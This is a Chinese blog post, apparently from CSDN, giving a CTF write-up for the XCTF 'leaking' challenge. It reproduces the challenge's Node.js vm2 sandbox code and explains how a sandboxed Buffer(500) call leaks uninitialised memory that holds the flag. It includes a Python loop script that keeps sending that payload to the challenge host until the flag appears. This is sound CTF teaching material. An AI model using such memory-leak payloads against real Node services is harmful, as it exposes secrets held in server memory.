攻防世界-leaking-(详细操作)做题过程

已于 2022-06-20 23:02:50 修改
阅读量254 收藏 1
点赞数
分类专栏: 攻防世界 web 高手篇 文章标签: javascript 前端 开发语言
于 2022-06-18 23:45:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43715020/article/details/125346762
版权

如有不对的地方,还请各位大佬指正。下面开始做题:

进入题目以后是一串代码,又是代码审计,很烦啊......哎。下面是需要了解的php函数含义:

require()是php的内置函数,作用是引入或者包含外部php文件。

  工作原理:当本身php文件被执行时,则外部文件的内容就将被包含进该自身php文件中;当包含的外部文件发生错误时,系统将抛出错误提示,并且停止php文件的执行。

 res.header:PHP中的header() 函数用于向客户端发送原始的 HTTP 报头

eval()函数 eval() 函数把字符串按照 PHP 代码来计算

console.log("内容");

作用:将"内容"输出在控制台中,方便以后的调试,是一个使用频率极高的功能。(控制台在浏览器中按F12,打开开发者模式的第二项(console)即可,并且也可以在console选项卡下即时做测试)

"use strict";

var randomstring = require("randomstring");
var express = require("express");
var {
    VM
} = require("vm2");
var fs = require("fs");

var app = express();
var flag = require("./config.js").flag

app.get("/", function(req, res) {
    res.header("Content-Type", "text/plain");

    /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */
    eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\";")
    if (req.query.data && req.query.data.length <= 12) {
        var vm = new VM({
            timeout: 1000
        });
        console.log(req.query.data);
        res.send("eval ->" + vm.run(req.query.data));
    } else {
        res.send(fs.readFileSync(__filename).toString());
    }
});

app.listen(3000, function() {
    console.log("listening on port 3000!");
});

完全没思路,只能观看其他大佬写的文章,提示我们关键语句是var  {VM}=require("vm2"),这句话的node.js沙盒的官方库,所以还需要了解node.js,连接在这里node.js 沙盒逃逸分析 - 掘金

在较早一点的 node 版本中 (8.0 之前),当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这个 Buffer 是未清零的。8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存。

再加上eval()函数会将flag读入到内存中的全局变量中,所以我们只要通过沙箱里的eval去读内存条中的内容,就可以形成沙盒逃逸,本题没有用到原型链,可以直接利用buffer()读取内存的内容,由于内存保护机制,并不是每一次都能读取到flag内容的代码,多运行几次就能读到flag了,可以构建出payload:/>data=buffter(1000),获得flag的代码:


import requests
import time
url = 'http://111.200.241.244:60974/?data=Buffer(500)'
response = ''
while 'flag' not in response:
        req = requests.get(url)
        response = req.text
        print(req.status_code)
        time.sleep(0.1)
        if 'flag{' in response:
            print(response)
            break

运行以后就可以得到了flag{4nother_h34rtbleed_in_n0dejs}

角一角
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cisco-Fusion-Router-IOS-XE-route-leaking-guide from yuanshou
06-17
Cisco_Fusion_Router_IOS_XE_route-leaking_guide from yuanshou
攻防世界——leaking
m0_62063669的博客
06-24 275
攻防世界——leaking进入环境,给了一段代码浅谈npm,vm,vm2,Node.js沙盒逃逸这是一是关于Node.js沙盒逃逸的。其中var { VM } = require(“vm2”);是Node.js 官方安全沙箱的库(是Node.js有关沙盒的代码)低版本的node可以使用buffer()来查看内存,只要调用过的变量,都会存在内存中,那么可以构造paylaod来读取内存 req.query.data.length 的限制可以通过传入数组绕过1.目通过访问得到了一串代码,这段代码提示在沙箱中.
xctf攻防世界Leaking wp
sash1mi
01-15 1676
访问目地址 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res) { .
攻防世界 WEB leaking
qq_41696858的博客
08-25 356
考的是node.js沙箱逃逸,之前没遇到过,属于是又学到新知识了 具体看这一篇,https://juejin.cn/post/6889226643525599240 简单说一下原理吧,就是理论上沙箱里的代码只能与vm上下文打交道,可是vm上下文确是可以与沙箱外的代码和变量打交道的,因此,如果我们能够构造请求, 使得vm上下文代替我们去读取利用沙箱外的代码和变量的话,那就形成了沙箱逃逸,拿这一来举个例吧 先看一下代码 "use strict"; var randomstring = require("
xctf攻防世界 Web高手进阶区 leaking
l8947943的博客
01-01 1627
1. 进入环境,查看内容,给了一堆代码 看到基本的代码格式,还有其中var { VM } = require(“vm2”);,这是Node.js的代码。其中也给了一句注释: /* Orange is so kind so he put the flag here. But if you can guess correctly :P */ eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\"
攻防世界 web高级 leaking
beihai2013
01-18 677
考察:node.js逃逸 参考: https://blog.csdn.net/weixin_44037296/article/details/112387663 https://blog.csdn.net/weixin_46676743/article/details/112669105 不知道咋说,直接抄源码 # encoding=utf-8 import requests import time url = 'http://220.249.52.134:41148/?data=Buffer(500)'
private-leaking-investigation:用于演示 AngularJS 内存泄漏的示例应用程序
06-18
私人泄密调查 用于演示 AngularJS 内存泄漏的示例应用程序
信息安全_数据安全_asec-t08-leaking-ads-is-user-data-truly-secure.pdf
08-21
信息安全_数据安全_asec-t08-leaking-ads-is-user-data-truly-secure 金融安全 安全研究 安全编码 安全审计 漏洞挖掘
Gradient Inversion Attack Leaking Private Labels in Two-Party Sp
01-03
Gradient Inversion Attack Leaking Private Labels in Two-Party Split Learning_两方分裂学习中泄漏私有标签的梯度反转攻击.pdf
go-leak:检测Go中的各种泄漏
05-02
我在TODO上拥有它来重整个事情并添加更多用例,但是我首先需要一些其他开源项目。 因此,如果您有空余时间想发送邮件给我或在项目的跟踪器中提交问。 注意:由于Go的作用域很广,因此必须避免使用与标记和...
攻防世界 web leaking
Zeker62的博客
09-08 190
https://blog.csdn.net/weixin_46676743/article/details/112669105
攻防世界xctfwebleaking
qq_60787987的博客
03-13 5869
11打开网站我们可以看到如下代码: 正在上传… 重新上传 取消
BUUCTF--[HITCON 2016]Leaking
qq_46263951的博客
08-13 248
进入页面后给出代码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res).
攻防世界 web高手进阶区 5分 leaking
闵行小鱼塘
04-14 608
攻防世界web高手进阶区的5分,本篇是leaking的writeup
BUUCTF [HITCON 2016] Leaking
Senimo
01-15 766
BUUCTF [HITCON 2016] Leaking 考点: 启动环境: "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.g
[HITCON 2016]Leaking
fmyyy1的博客
05-25 312
"use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res) { res.he
攻防世界(pwn)250
PLpa的博客
03-23 487
前言: 此说难也不是很难,但是需要一些基础知识,否则利用起来比较困难。 只开了NX保护的32位程序。 此里面的功能函数几乎都是自己写的,所以说没有一点基础知识,利用起来还是挺麻烦的。 我们看到里面有一个自己写的print函数 我们点进去发现,由于size是我们自己决定的,所以里面存在一个栈溢出漏洞。 但是我们并不知道远端的libc环境版本,函数几乎自写,我们基本没什么信息可以利用,所以传...
buuctf-Can you guess it?(代码审计)
m0_62094846的博客
05-15 321
random_bites:生成适合加密使用的任意长度的加密随机字节字符串 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)...
[Zer0pts2020]Can you guess it?(basename漏洞)
qq_54929891的博客
03-22 3006
点击source <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)"); } if (isset($_GET['source'])) { highl
Leaking Caffe2 thread-pool after fork.
最新发布
05-23
这个错误通常是由于在主进程中创建了Caffe2线程池,但在子进程中没有正确地清理它所引起的。这可能会导致子进程中的线程池泄漏,从而导致性能下降或其他问。 要解决此问,您可以在fork之后立即清理Caffe2线程池...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值